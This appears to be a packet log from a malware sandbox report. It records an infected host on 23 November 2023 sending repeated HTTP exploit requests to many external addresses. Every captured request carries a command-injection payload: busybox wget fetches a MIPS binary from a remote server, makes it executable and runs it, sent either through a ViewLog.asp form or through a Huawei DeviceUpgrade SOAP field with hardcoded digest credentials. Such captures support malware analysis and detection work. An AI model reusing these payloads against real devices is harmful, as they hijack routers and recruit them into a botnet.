                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.581665039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:36.613147020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.676296949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.826065063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              254192.168.2.144740885.18.45.1128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:15.281282902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.483668089 CET78INHTTP/1.1 404 Not Found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              255192.168.2.143841285.122.222.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:15.479904890 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              256192.168.2.143548831.136.121.1698080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:15.877996922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:16.453975916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.605957985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.973836899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.581654072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:33.797283888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.484462976 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.346967936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              257192.168.2.144283494.126.10.448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:15.905812979 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:16.118421078 CET314INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 130
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              258192.168.2.146095895.125.147.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.098995924 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.476150036 CET429INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain
                                              Date: Thu, 23 Nov 2023 04:16:15 GMT
                                              Access-Control-Expose-Headers: Location
                                              Access-Control-Allow-Methods: POST, GET, PUT, DELETE, OPTIONS
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Cache-Control
                                              Connection: keep-alive
                                              Content-Length: 22


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              259192.168.2.1460320156.241.92.16437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.383093119 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:18.373914957 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:20.741868973 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
